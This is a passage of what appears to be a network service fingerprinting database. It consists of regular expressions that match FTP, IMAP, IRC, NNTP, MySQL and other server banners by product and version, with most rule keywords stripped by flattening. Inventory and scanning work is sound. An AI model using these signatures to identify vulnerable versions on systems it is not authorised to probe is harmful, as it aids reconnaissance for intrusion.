socket)\r\n -500 OOPS: vsftpd: (.*)\r\n -220[- ]FileZilla Server version (\d[-.\w ]+)\r\n -220 ([-\w_.]+) running FileZilla Server version (\d[-.\w ]+)\r\n -220.*\r\n220[- ]FileZilla Server version (\d[-.\w ]+)\r\n -220-.*\r\n220-\r\n220 using FileZilla FileZilla Server version ([^\r\n]+)\r\n -220-FileZilla Server\r\n -431 Could not initialize SSL connection\r\n -220 AXIS ([\w._-]+) Network Camera ([\w._-]+ \(\w+ \d+ \d+\)) ready\.\r\n -220 AXIS StorPoint CD E100 CD-ROM Server V([\d.]+) .* ready\.\r\n -220 AXIS (.+) FTP Network Print Server V([-\w_.]+) -220 AXIS (\w+) Network Fixed Dome Camera (.*) ready\.\r\n -220-Cerberus FTP Server Personal Edition\r\n220-UNREGISTERED\r\n -220-Cerberus FTP Server - Personal Edition\r\n220-UNREGISTERED\r\n220-Welcome to Cerberus FTP Server\r\n220 Created by Grant Averett\r\n -220[ -].*FTP server \(lukemftpd (\d[-. \w]+)\) ready\.\r\n -220[ -]Serv-U FTP[ -]Server v([\w._-]+) -220-Serv-U FTP Server for Winsock\r\n -220-FTP Server v([\d.]+) for WinSock ready\. -431 Unable to negotiate secure command connection\.\r\n -220-FTP Server ready\r\n220-Use USER user@host for native FTP proxy\r\n220 Your FTP Session will expire after 300 seconds of inactivity\.\r\n -220 JD FTP Server Ready -220 ([-.\w]+) FTP server \(Version ([-.+\w()]+)\) ready\.\r\n -220 Server \(ProFTPD\) \[([-.\w]+)\]\r\n -220 ProFTPD (\d\S+) Server -220 FTP Server \[([-\w_.]+)\]\r\n -220.*ProFTP[dD].*Server ready -220 ProFTP Server Ready\r\n -220 Welcome @ my\.ftp\.org\r\n -220 .* FTP Server \(ProFTPD ([\d.]+) on Red Hat linux ([\d.]+)\) ready\.\r\n -220 ProFTP-Server auf ([-\w_.]+)\r\n -220.*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD\) -220 FTP Server ready\.\r\n -220.*NcFTPd Server -220 ([-\w_.]+) FTP server \(SunOS 5\.([789])\) ready -220 VxWorks FTP server \(VxWorks ?([\d.]+) - Secure NetLinx version \(([\d.]+)\)\) ready\.\r\n| p|AMX NetLinx A/V control system ftpd -220[- ]FTP server ready\.\r\n.*214 Pure-FTPd - http://pureftpd\.org/?\r\n -220---------- Welcome to Pure-FTPd \[privsep\] \[TLS\] ----------\r\n220-You are user number| p/Pure-FTPd/ i|with SSL/TLS -220 ready, dude \(vsFTPd (\d[0-9.]+): beat me, break me\)\r\n -220 TYPSoft FTP Server (\d\S+) ready\.\.\.\r\n -220- Welcome to this Xitami FTP server, running version ([\d\w.]+) of Xitami\. \n You are user number (\d+) of a permitted (\d+) users\.| p/Xitami ftpd/ v/1/ i|2/3 users -220 Service Ready for new User\r\n -220 ([-\w]+) FTP server \(NetWare (v[\d.]+)\) ready\.\r\n -220 ([-.+\w]+) FTP SERVICE ready\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n -220 FTP server \(Hummingbird Ltd\. \(HCLFTPD\) Version ([\d.]+)\) ready\.\r\n -220-\r\n Your connection logged!\r\n220 ([\w_.-]+) FTP server \(NetBSD-ftpd 200\d+\) ready\.\r\n -220 CommuniGate Pro FTP Server ([\d.]+) ready\r\n -(?:220.*\r\n)?220 [Ee]valine FTP server \(Version: Mac OS X -220 WinGate Engine FTP Gateway ready\r\n -220 Welcome to Quick 'n Easy FTP Server\r\n -421 Too many connections for this IP address, please try again later\.\r\n -220 Canon EB-65 FTP Print Server V([\d.]+) .* ready\.\r\n -500 OOPS: .*\r\n -500 OOPS: vsftpd: both local and anonymous access disabled!\r\n -220 lankacom FTP server \(MikroTik v?([\w._-]+)\) ready\r\n -220 AL-(\w+)-[0-9A-F]+ FTP server \(OEM FTPD version ([\d.]+)\) ready\.\r\n -220 ioFTPD \[www: http://www\.ioftpd\.com\] - \[version: ([-\w_. ]+)\] server ready\.\r\n -220 CesarFTP ([\w.]+) Server Welcome !\r\n -220 CesarFTP ([\w.]+) \xb7\xfe\xce\xf1\xc6\xf7\xbb\xb6\xd3\xad !\r\n -220 BlackMoon FTP Server - Free Edition - Version ([\d.]+)\. Service Ready\r\n -220 netapp ftp server\r\n -220 ([-\w_.]+) FTP server \(OSF/1 Version ([\d.]+)\) ready\.\r\n| p|OSF/1 ftpd| i|OSF/1 2 -220 ([\w._-]+) FTP server ready\.\.\.\r\n -220-TYPSoft FTP Server ([\d.]+) ready\.\.\.\r\n -220 OKI-([\w+]+) Version ([\d.]+) ready\.\r\n -220 ShareIt FTP Pro ([\d.]+) \(WINCE\) Ready\.\r\n -220 ISOS FTP Server for Upgrade Purpose \(([\d.]+)\) ready\r\n -220 PV11 FTP Server ready\r\n -220 Alize Session Manager FTP Server\r\n -220-FTP Server ready\r\n220-Welcome to the Sambar FTP Server\r\r\n -220 DataHive FTP Server ([\d.]+) Ready\.\r\n -220 copier2FTP server ready\.\r\n -220 DrayTek FTP version ([\d.]+)\r\n -220 ([-\w_.]+) FTP server ready \(mod_ftpd/([\d.]+)\)\r\n -220 DELL1700n Dell Laser Printer 1700n FTP Server ([\w.]+) ready\.\r\n -220 Dell Laser Printer 3100cn\r\n -220 \w+ Dell Laser Printer M5200 FTP Server ([\d.]+) ready\.\r\n -220 Welcome to the dvd2xbox ftp server\.\r\n -220 Welcome To WinEggDrop Tiny FTP Server\r\n -220 NRG (\w+) FTP server \(([\d.]+)\) ready\.\r\n -220 wzd server ready\.\r\n -500 Sorry, no server available to handle request on ([-\w_.:]+)\r\n -220 NET\+ARM FTP Server ([\d.]+) ready\.\r\n -220 Connected to ([-\w_.]+) ready\.\.\.\r\n -220 NETWORK HDD FTP Server ready\.\r\n -220 Blue Coat FTP Service\r\n -220 Homer Ftp Server\r\n -220 Personal FTP Server ready\r\n -220 Golden FTP Server PRO ready v([\w._-]+)\r\n -220 IBM TCP/IP for OS/2 - FTP Server ver ([\d:.]+) on .* ready\.\r\n| p|IBM OS/2 ftpd| v/1/ o|OS/2 -220 AudioVAULT FTP server\r\n -220 .* Server \(vftpd ([\d.]+)\) ready\.\r\n -220-TwoFTPd server ready\.\r\n220 Authenticate first\.\r\n -220 \(Ver\. ([^)]+)\) [A-Z][a-z]{2} \d+ 20\d+ ready\.\r\n| p|Canon VB-C10/VB-C10R webcam ftpd -220 Cisco \(([\d.]+)\) FTP server ready\r\n -220 \"Global Site Selector FTP\"\r\n -220 Willkomen auf Ihrer Dreambox\.\r\n -Error loading /etc/ssl/certs/ftpd\.pem: -220 FTP server \(Medusa Async V([\d.]+) \[experimental\]\) ready\.\r\n -220 ([-\w_.]+) \(Aironet (BR\w+) V([\d.]+)\) ready\r\n -220-Welcome To Rumpus!\r\n220 Service ready for new user\r\n -220 IB-23 Ver ([\d.]+) FTP server\.\r\n -220 Disk Station FTP server at ([-\w_.]+) ready\.\r\n -refused in\.ftpd from [-\w_.]+ logged\n -220 Xlight Server ([\d.]+) ready\.\.\. \r\n -220 FS-3820N FTP server\.\r\n -220 Scala FTP \(\"Scala InfoChannel Player \d+\" ([\w/.]+)\)\r\n -220 RICOH Aficio MP C2500 FTP server \(([\d.]+)\) ready\.\r\n -220 FTP Services for ClearPath MCP: Server version ([\d.]+)\r\n -ftpd - accept the connection from [\d.]+\n220-eDVR FTP Server v([\d.]+) \(c\)Copyright WebGate Inc\. \w+-\w+\r\n220-Welcome to (DS\w+)\r\n220 You will be disconnected after 180 seconds of inactivity\.\r\n -220 Canon iN-E5 FTP Print Server V([-\w_.]+) -220 FTP-Backupspace\r\n -220 zFTPServer v([-\w_.]+), build ([-\d]+) -220 HP166XC V([-\w_.]+) FUSION FTP server \(Version ([-\w_.]+)\) ready\.\r\n -220 FTP Server, type 'quote help' for help\r\n -550 no more people, max connections is reached\r\n -220 RICOH Aficio SP C811DN FTP server \(([-\w_.]+)\) ready\.\r\n -220 Microtest SuperCD-cdserver FTP server \(Version V([\w._-]+)\) ready\.\r\n -220 Belkin Network USB Hub Ver ([\w._-]+) FTP server\.\r\n -220-TCP/IP for VSE FTP Daemon Version ([\w._-]+) -220 FTP server: Lexmark Optra LaserPrinter ready\r\n -220 NSE \(AG 5000 v([\w._-]+)\) FTP server ready\r\n -220 TOSHIBA e-STUDIO5500c FTP server \(([\w._-]+)\) ready\.\r\n -220 ([\w._-]+) FTP server \(EMC-SNAS: ([\w._-]+)\) ready\.\r\n -220-CentOS release ([\w._-]+) .*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD Default Installation\) -.* klogd: klogd started: BusyBox v([\w._-]+) \(.*\)\r\nDoing BRCTL \.\.\.\r\nsetfilter br0 0 \r\n/var/tmp/act_firewall: No such file or directory\r\n -220.* GlobalSCAPE Secure FTP Server \(v\. ([^\)]+)\) -220 Welcome to Ocean FTP Server. -220 4dftp .* FTP Service \(Version ([^)]+)\) -220 IBM NPS 540\+/542\+ FTP Printer Server V([\w._-]+) | p|IBM NPS 540+/542+ print server ftpd -220 SAVIN 8055 FTP server \(([\w._-]+)\) ready\.\r\n -421 Closing non-secure connections in Secure Mode\. \r\n -220 DrFTPD\+ ([\w._-]+) \(\+STABLE\+\) \Revision: (\d+) \ http://drftpd\.org\r\n -220 Conti FTP Server ready\r\n -220 Welcome to Mobile File Service\r\n\r\n| p|HTC P4000 PDA/Phone ftpd -220 ([\w._-]+) FTP server \(WS2000 FTPD Server\) ready\.\r\n| p|Motorola/Symbol WS2000 WAP ftpd -220- \w+\r\n220 FTP Server powered by: Quick 'n Easy FTP Server\r\n -220 Welcome to the NSLU2 vsftp daemon\.\r\n -220 Star IFBD-HE05/06 FTP Server\.\r\n -220 Welcome to Baby FTP Server\r\n -220 ([\w_.-]+) FTP server \(witelcom ([\d.]+)\) ready\r\n -220 FTP Server \(ZyWALL (USG \w+)\) \[[\w._-]+\]\r\n -220 ALFTP Server ready\. \^-\^\)/~\r\n -220 vxTarget FTP server \(VxWorks ([\d.]+)\) ready\.\r\n -220 ET(\w+) ([\w-]+) Series FTP Server ready\.\r\n -220 aFTPServer ready \(cwd is /\)\r\n -220 FTP version ([\w.]+)\r\n -220 pyftpdlib ([\w._-]+) ready\.\r\n -220 ([\w._-]+) FTP SERVER T9552G07 \(Version ([\w._-]+) TANDEM ([\w._-]+)\) ready\.\r\n -220 [\w._-]+Citizen_CLP([\w._-]+) FTP server \(InterCon version ([\w._-]+)\) ready\.\n -220 Nucleus FTP Server \(Version ([\w._-]+)\) ready\.\r\n -220 Wing FTP Server ([\w._-]+) ready\.\.\.\r\n -220 OpenFTPD server([^ ]+)? -220 Ftp service of Jana-Server ready\r\n -220 Frox transparent ftp proxy\. Login with username\[@host\[:port\]\]\r\n -501 Proxy unable to contact ftp server\r\n -220 ([-.+\w]+) FTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n -220-Sidewinder ftp proxy\. You must login to the proxy first -220 webshield2 FTP proxy ready\.\r\n -220 WinProxy \(Version ([^)]+)\) ready\.\r\n -220 ([-\w_.]+) FTP proxy \(Version V([\d.]+)\) ready\.\r\n -220 Finjan SurfinGate Proxy - Server Ready\.\r\n -220- ([-\w_.]+) PROXY-FTP server \(DeleGate/([\d.]+)\) ready\.\r\n -500 WinGate Engine Access Denied\r\n -220 IWSS FTP proxy ready\r\n -220 FTP proxy \(v([\d.]+)\) ready\r\n530 Login incorrect\. Expected USER command\r\n -220-Welcome to SpoonProxy V([\w._-]+) by Pi-Soft Consulting, LLC\r\n -220-CCProxy FTP Service\(Unregistered\)\r\n -220 kingate\(([\w._-]+)-win32\) ftp proxy ready\r\n -220 FileCatalyst Server Enterprise v([^\r\n]*)\r\n -220 ([\w._-]+), KEN! DSL FTP-Gateway\r\n -421 Service not available \(The FTP server is not responding\.\)\n -220 (\S+) SVDRP VideoDiskRecorder (\d[^\;]+); -220-\r?\n220 - ftp -\0\0\0\\\x80\x06\0\0\0\n\x01\x03\0\x01\x86\xaf\0\0\0\n\x10\x03\0\0\0\x01\0\0\0\x15\x11\x05FSAE server ([\d.]+)\0\0\0\x16\x12\x01................\0\0\0\x17\x13\x01FSAE_SERVER_\d+ -\0Check Point FireWall-1 authenticated RLogin server running on ([-.\w]+)\r\n\r -220 Fyre rendering server ready\n -\0\0\0\t\0\0\0\x80\0\0\0\0\0\0\0\0\0\0\x042\0\0\0\x01\0\0\t_\0\0\0h -HELLO_BOT\r\n -HELLO_CONTROL_SERVER\r\n -\xff\xfe\x01Genetec Integration Service \(STUDENT03\)\r\n\r\n\r\n\r\n========================================================================\r\n Integration Service Main Menu\r\n========================================================================\r\n\r\n 1\) CONFIG\r\n Displays the configuration settings for the service\r\n\r\n 2\) STATUS\r\n Displays the status of the external systems being run by this\r\n service\.\r\n\r\n \?\) Help\r\n\r\n x\) Exit\r\n========================================================================\r\n -%%QU%%QU%%QU -\nClient limit exceeded\.\n -3Connection to [\d.]+ is denied -- no authorization\.\r\n -GIOP\x01...\0\0\0\0 -\x03\0\0.*@ -\xff\xfd.| p|GNU Gatekeeper -Helpdesk Advanced ([\d.]+) License Logging Service -\(\0\0\0\0\0\0\0..`\0\x01\xff\xff\xff\xcc\xfa\x85\0C\x1d\xe6whfnk\.\.\.E\0\0\0\0\0\0\0\0 -HTTP/1\.1 400 Bad Request\r\n.*\r\n\r\n

Bad Request \(Invalid Verb\)

-HTTP/1\.0 400 Bad Request\r\nContent-Type: text/html\r\nPragma: no-cache\r\nConnection: close\r\nContent-Type: text/html; charset=us-ascii\r\n\r\nInvalid request


This message was created by Kerio Control Proxy {665} -220 JetDirect GGW server \(version (\d[\d.]+)\) ready\r\n -220 HP GGW server \(version ([\w._-]+)\) ready\r\n\0 -00 -01 -\xab\xab\xab\xab\xa0\x81\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\r\n Welcome To\r\n ichat ROOMS (\d[-.\w]+)\r\n== -IceP\x01\0\x01\0\x03\0\x0e\0\0\0 -flock\(\) on closed filehandle .*midentd -\"\0\x04\0 -IUSB \0\0\0\x007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xf1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\* OK ([-/.+\w]+) Solstice \(tm\) Internet Mail Server \(tm\) (\d[-.\w]+) IMAP4 service - at -\* OK GroupWise IMAP4rev1 Server Ready\r\n -\* OK \[CAPABILITY IMAP4rev1 .*\] GroupWise Server Ready\r\n -\* OK dbmail imap \(protocol version 4r1\) server (\d[-.\w]+) ready to run\r\n -\* OK ([-.+\w]+) NetMail IMAP4 Agent server ready -\* OK IMAP4 Server \(IMail ([-.\w]+)\) -\* OK ([-.+\w]+) IMAP4rev1 Mercury/32 v(\d[-.\w]+) server ready\.\r\n| p|Mercury/32 imapd -\* OK ([-.\w]+) IMAP4 service \(Netscape Messaging Server (\d[-.\w ]+) \(built ([\w ]+)\)\)\r\n -\* OK eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) IMAP4 server started\r\n -\* OK ([-.\w]+) NetMail IMAP4 Agent server ready <.*>\r\n -\* OK ([-.\w]+) IMAP4rev1 MDaemon (\d[-.\w]+) ready\r\n -\* OK [Dd]ovecot MUA ready\r\n -\* OK \[CAPABILITY IMAP4rev1 SORT THREAD=REFERENCES MULTIAPPEND UNSELECT LITERAL\+ IDLE CHILDREN NAMESPACE LOGIN-REFERRALS [^\]]+\] -\* OK \[CAPABILITY IMAP4rev1 .*?Courier-IMAP ready\. Copyright 1998-\d+ Double Precision, Inc\. See COPYING for distribution information\.\r\n -\* OK CommuniGate Pro IMAP Server ([-.\w]+) at ([-.\w]+) ready\r\n -\* OK \[CAPABILITY IMAP4rev1 CHILDREN NAMESPACE\] Freemail ready - hit me with your rhythm stick\.\r\n -\* OK AVM KEN!4 IMAP Server ready\r\n -\* OK Microsoft Exchange 2000 IMAP4rev1 server version (\d[-.\w]+) \([-.\w]+\) ready\.\r\n -\* OK Der Microsoft Exchange Server 2003 IMAP4rev1-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n -\* OK Server Microsoft Exchange IMAP4rev1 verze ([\d.]+) \(([-\w_.]+)\) je p\xf8ipraven\.\r\n -\* OK La version ([\d.]+) \(([-\w_.]+)\) du serveur IMAP4rev1 Microsoft Exchange est pr\xeate\r\n -\* OK Microsoft Exchange Server 2003 IMAP4rev1 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) -\* OK Servidor IMAP4rev1de Microsoft Exchange Server 2003 versi\xf3n ([\w._-]+) \(([\w._-]+)\) listo\.\r\n -\* OK The Microsoft Exchange IMAP4 service is ready\.\r\n -\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? v([-.\w\+]+) server ready\r\n -\* OK ([-.\w]+) Cyrus IMAP4 v([-.\w\+]+)-Red Hat [-.\w\+]+ server ready\r\n -\* OK ([-\w_.]+) Cyrus IMAP4 v([-\w_.]+)-Debian| p/Cyrus imapd/ v/2/ i|Debian/Ubuntu -\* OK ([-.\w]+) Cyrus IMAP4 v([\w_.]+)-OS X ([\d.]+) server ready\r\n -\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? Murder v([-.\w]+) server ready\r\n -\* OK Welcome to Binc IMAP v(\d[-.\w]+) -\* OK ([-\w_.]+) Oracle Email Server esimap\t([\d.]+) \t is ready\r\n -\* OK Kerio MailServer ([\d.]+) patch (\d+) IMAP4rev1 server ready\r\n -\* OK Netscape IMAP4rev1 Service ([\d.]+) on ([-\w_.]+) at .*\r\n -\* OK IMAP4 server ready \(Worldmail ([\d.]+)\)\r\n -\* OK HT Mail Server v([\d.]+) IMAP4rev1 .*\r\n -\* OK Softalk IMAP Server ready\r\n -\* OK Welcome to Binc IMAP -\* OK ([-\w_.]+) Mirapoint IMAP4 ([-\w.]+) server ready\r\n -\* OK IMAP4rev1 DvISE Mail Access Server MA-([\w.]+) \(\w+\)\r\n -\* OK IMAP4rev1 GNU mailutils ([\w.]+)\r\n -\* OK IMAP ([-\w_.]+) \(Version ([-\w.]+)\)\r\n -\* OK \[CAPABILITY IMAP4 IMAP4rev1[\w+= -]*\] ([\w._-]+) IMAP4 service \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n -\* OK \[CAPABILITY IMAP4[^\]]*\] Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n -\* OK ([-\w_.]+) IMAP4 service \(iPlanet Messaging Server ([\w. ]+) \(built .*\)\)\r\n -\* OK Anonymous Mail Server v([\d.]+) IMAP4rev1 .*\r\n -\* OK ([-\w_.]+) ModusMail IMAP4 Server ([\d.]+) ready\r\n -\* OK IMAP4rev1 Service at Jana-Server ready\r\n -\* OK \]-:\^:-\[ IMAP4rev1 .*\r\n -\* OK ([-\w_.]+) IMAP4 Service ([\d.()]+) at .*\r\n -\* OK CommuniGate Pro IMAP Server ready\r\n -\* OK IMAP4rev1 SmartMax IMAPMax (\d+) Ready\r\n -\+OK X1 ([-\w_.]+)\r\n -\* OK IMAP4rev1 SmarterMail\r\n -\* OK Scalix IMAP server ([\d.]+) ready on ([-\w_.]+)\r\n -\* OK Scalix IMAP server ([\d.]+) on ([-\w_.]+)\r\n -\* OK .* GoMail V([-\w_.]+) IMAP4rev1 -\* OK IMAP4 ready! [-\w_.]+ Winmail Mail Server MagicWinmail Extend IMAP 101\r\n -\* OK ([-\w_.]+) CallPilot IMAP4rev1 v([\d.]+) server ready\.?\r\n -\* OK ([-\w_.]+) Zimbra IMAP4rev1 service ready\r\n -\* OK ([-\w_.]+) Zimbra IMAP4rev1 server ready\r\n -\* OK ([-\w_.]+) DKIMAP4 IMAP Server\r\n -\* OK ArGoSoft Mail Server IMAP Module v\.([\w._-]+) at -\* OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+)\r\n -\* OK MERCUR IMAP4-Server \(v([\w.]+) \w+\) for Windows ready -\* OK Dovecot DA ready\.\r\n -\* OK AXIGEN ([\w._-]+) \(Linux/i686\) IMAP4rev1 service is ready\r\n| p/Axigen imapd/ v/1/ i|Linux/i686 -\* BYE Hi This is the IMAP SSL Redirect\r\n -\* BYE Domino IMAP4 Server Configured for SSL Connections only\. Please reconnect using SSL Port (\d+), .*\r\n -\* OK Kerio Connect ([\w._ -]+) IMAP4rev1 server ready\r\n -\* OK ([\w._-]+) IMAP4rev1 Server PMDF V([\w._-]+) at -\* OK \[CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL\+ NAMESPACE UIDPLUS CHILDREN LANGUAGE XSENDER X-NETSCAPE XSERVERINFO AUTH=PLAIN\] Messaging Multiplexor \(Oracle Communications Messaging Exchange Server ([\w._-]+) \(built (\w+ \d+ \d+)\)\)\r\n -\* OK IMAP4 Ready ([-\w_.]+) \w+\r\n -\* OK ([-\w_.]+) IMAP server ready\r\n -\* OK IMAP4 proxy ready\r\n -\* OK imapfront ready\. \+ portspoof\r\n -\* OK avast! IMAP Proxy\r\n -\* OK \[CAPABILITY IMAP4rev1\] SpamPal for Windows\r\n -\* OK [-.\w,:+ ]+imap[-.\w,:+ ]+\r\n -\* OK Cyrus IMSP version (\d[-.\w]+) ready\r\n -Protocol Error: XML data is not well-formed\. -\d+\0FORWARD\0\x0b\xc2c\x0c\xc1a\x9f@ -\x0e\0\0\0\0\0\0 -NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Found your hostname, cached\r\nNOTICE AUTH :\*\*\* Checking Ident\r\n -NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* No ident response\r\n -NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* Couldn't look up your hostname\r\n -ERROR..Your host is trying to \(re\)connect too fast -- throttled\r\n -CAPAB START\r\nCAPAB MODULES [\w_-]+\.so, -CAPAB START 1202\r\n -:([\w._-]+) NOTICE ZUSR :You have been throttled for 2 minutes for too many connections in a short period of time\. Further connections in this period will reset your throttle and you will have to wait longer\.\r\n -ERROR Your host is trying to \(re\)connect too fast -- throttled\r\n -IRCXPRO ([\w._-]+)\r\nAUTHREQUEST :Authentication Required\r\n -:([\w._-]+) 451 \* HELP :No te has registrado\r\n -:([\w._-]+) NOTICE AUTH :Minbif-IRCd initialized, please go on\r\n -:.*!psyBNC@lam3rz\.de NOTICE \* : -:.*!psyBNC@[-\w_.]+ NOTICE \* :psyBNC on ([-\w_.]+)\r\n -:sbnc!sbnc@sbnc\.soohrt\.org NOTICE \* :Wellcum\r\n -\0\0\0.\x08\x01\x04\x01\0..\0\0..\0\0.\0\0\0..\0\0\x80\x04..\0.\0\xa0\0\0 -.*\0\x18Ixia Hardware I/O Server\x13Ixia Communications\x18Ixia Hardware I/O Server\x0b([\d.]+) -\r\nWelcome to the Ixia Socket/Serial TCL Server\r\nPress Ctrl-C to reset Tcl Session\r\nIxia> -JDWP-Handshake -cpu: *[\d.]+ mem: *[\d.]+ swp: *[\d.]+\0 -\xde\xca\xfb\xad\x01\0\0\0\x04\0\t\0[\x07\x10] -ksysguardd ([\d.]+)\n\(c\) -\d+ .*\n\x000 succeeded\n\0 -0 succeeded\n\0 -220 ([-.\w]+) LMTP Cyrus v(\d[-.\w]+) ready\r\n -220 ([\w._-]+) Cyrus LMTP Murder v([\w._-]+) server ready\r\n -220 ([-\w_.]+) LMTP Cyrus v([\d.]+)-Red Hat [\d.-]+ ready\r\n -220 ([-\w_.]+) DBMail LMTP service ready to rock\r\n -220 DSPAM LMTP ([-\w_.]+) Ready\r\n -\x01\*Nsure Audit Novell NetWare \[\w+:\w+\]\r\n -LNS READY<> -0001;2 -\x80\0\0\\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\0 -\xc1, -\n.*=\[ msf v([^\r\n]+)\r?\n.*\d+ exploits.*\d+ payloads.*\d+ encoders.*\d+ nops.*msf > -MIDASd v([\w.]+) connection accepted\n\xff -\xff\0\x17Took too long to log in -merovingian:2:\w+:\n -MudNames ([\d.]+) - \(C\) 1997-2001 Ragnar Hojland Espinosa \n\r -# munin node at ([-\w_.]+)\n -MULTIPLICITYP - [\d.:a-f]+ is connected as <\w+>\.\n already connected: (.*?)\.\n -\xd6\x81\x81\0\0\xf9\0\xf9\xee\xe3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\x80\0\0\\0\0\0\x01....\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0|s p|Symantec/Veritas Backup Exec ndmp ->>messages/login\r\n----- Welcome to the No Name Go Server \(NNGS\) -----\r\n\r\n -.*\0\0\0\x06\0Donkey\x01\x0c\0\./donkey\.ini\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\xff\xfd\x1f[\r\n* ]+Welcome to MLdonkey \r\n -\xff\xfd\x1fWelcome to MLDonkey ([\d.]+)\n\x1b\[3.mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> -\xff\xfd\x1fWelcome to MLdonkey, visit http://mldonkey\.dyndns\.info for new Versions\n\x1b\[34mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> -[\x00-\x10]\0\0\0\0\0[^\0]\0\0\0 -\xac\xed\0\x05sr\0\x1elia\.Monitor\.monitor\.monMessage\x8e\xf8\xad\xb0\x14\xe6`!\x02\0\x03L\0\x05identt\0\x12Ljava/lang/Object;L\0\x06resultq\0~\0\x01L\0\x03tagt\0\x12Ljava/lang/String -\n\r\xff\xfbUDo you want ANSI color\? \(Y/n\) | p/ROM-based MUD/ i|http://rrp.rom.org/ -VERSION=MYPROXYv([\w._-]+)\nRESPONSE=1\nERROR=authentication failed\n\0 -.\0\0\0\xffj\x04Host hat keine Berechtigung, eine Verbindung zu diesem MySQL Server herzustellen\. -.\0\0\0\x0a([\w._-]+)\0............\0\x5f\xd1\x2d\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0............\0 -.\0\0\0\n(6\.[-_~.+\w]+)\0...\0 -.\0\0\0\xffj\x04'[\d.]+' .* MySQL -.{128}[\x46-\x53]... -200 NCID Server: ARC_ncidd ([\w._-]+)\r\nCIDLOG: \*DATE\* -Active Internet connections\nProto Recv-Q Send-Q Local Address Foreign Address \(state\)\n -netstat: invalid option -- f\nusage: netstat \[-veenNcCF\] -\x01\0\0\0\x01\0\0\0\0\0\0\0\n\x0c00\d{10} -\x06\x02...([\w._@-]+).. -smbd: error while loading shared libraries: libattr\.so\.1: cannot open shared object file: No such file or directory\n -502 You have no permission to talk\. Goodbye.\r\n -200 NNTP Service Microsoft\xae Internet Services (\d[-.\w]+) Version: \d+\.\d+\.\d+\.\d+ Posting Allowed \r\n -200 ([-.\w]+) DNEWS Version *(\d[-.\w]+).*posting OK \r\n -200 Leafnode NNTP Daemon, version (\d[-.\w]+) running at -200 Lotus Domino NNTP Server for ([-./\w]+) \(Release (\d[-.\w]+), .*\) - Not OK to post\r\n -20. ([-.\w]+) InterNetNews NNRP server INN (\d[-.\w ]+) ready \(no posting\)\.\r\n -200 ArGoSoft News Server for WinNT/2000/XP v ([\d.]+) ready\r\n -200 ([\w.-_]+) NetWare-News-Server/([\d.]+) 'LDNUM' NNRP ready \(posting ok\)\.\r\n -200 ([-\w_.]+) NNRP Service Ready - [-\w_.]+@[-\w_.]+ \(posting ok\)\.\r\n -200 ([-\w_.]+) InterNetNews server INN ([\d.]+) ready\r\n -200 nntp//rss v([\d.]+) news server ready\r\n| p|nntp//rss nntpd -200 Hi, you can post \(sn version ([\w.]+)\)\r\n -200 ([-\w_.]+) NNTP Service Ready, posting permitted\r\n -200 Jana news server ready - posting allowed\r\n -200 NNTP server NOFFLE ([\w.]+)\r\n -502 Could not get your access name\. Goodbye\.\r\n -201 NNTP server ready \(no posting\)\r\n502 No permission\r\n -200 ([-\w_.]+) - colobus ([\d.]+) ready - \(posting ok\)\.\r\n -200 +Kerio MailServer ([\d.]+) +NNTP server ready\r\n -200 NewsCache ([-\w_.]+), accepting NNRP commands\r\n -200 ([\w._-]+) Cyrus NNTP v([\w._-]+) server ready, posting allowed\r\n -200 ([-\w_.]+) ready for action \(Mailtraq ([\d.]+)/NNTP\)\r\n -200 Service available, posting allowed\r\n -200 ([-\w._]+) InterNetNews NNRP server INN (.*) ready \(posting ok\)\r\n -200 [-\[\]\(\)!,/+:<>@.\w ]*nntp[-\[\]\(\)!,/+:<>@.\w ]*\r\n -[4f]\0\0\0V4\x12\0\0\0\0\0\0\0\0\x00[4f]\0\0\0.\0\xf0\0\xd3\x07\t\0.\0.\0.\0.\0.\0..\0\0\0\0.\0\0\0..\0\0.\0 -.\0\x02\0([^\0]+)\0+.\0\x01\0 -200 OK [\d.]+ ([\w._-]+) oco-([\w._-]+) \n 